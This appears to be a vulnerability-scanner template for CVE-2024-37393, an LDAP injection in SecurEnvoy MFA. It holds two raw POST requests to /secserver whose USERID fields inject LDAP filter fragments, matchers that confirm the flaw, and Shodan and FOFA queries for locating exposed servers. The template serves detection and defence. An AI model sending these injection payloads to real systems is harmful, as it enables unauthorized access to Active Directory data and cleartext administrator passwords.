CVE-2024-37393: SecurEnvoy Two Factor Authentication - LDAP Injection

id: CVE-2024-37393
info:
  name: SecurEnvoy Two Factor Authentication - LDAP Injection
  author: s4e-io
  severity: critical
  description: |
    Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
  reference:
    - https://www.tenable.com/cve/CVE-2024-37393
    - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393
    - https://securenvoy.com
  classification:
    epss-score: 0.84656
    epss-percentile: 0.99281
  metadata:
    verified: true
    shodan-query: title:"SecurEnvoy"
    fofa-query: title="SecurEnvoy"
  tags: cve,cve2024,securenvoy,ldap,vuln,vkev

variables:
  userid: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /secserver/? HTTP/1.1
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:{{userid}})(sAMAccountName=*
        MEMBEROF:Domain Users

      - |
        POST /secserver/? HTTP/1.1
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:*)(sAMAccountName=*
        MEMBEROF:Domain Users

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'Error checking Group')"
          - "status_code_1 == 200"
          - "contains(body_2, 'GETPASSCODE')"
          - "status_code_2 == 200"
        condition: and
# digest: 4b0a00483046022100ce7caddd325b54d5f66e89660e68e7c79663cc52848de0b31a31514019b8699c022100fc6e6c543ac3d4e8c92e7fd63ae6487beee65f700dd9b8cb1998de9ccd753aaa:922c64590222798bb761d5b6d8e72950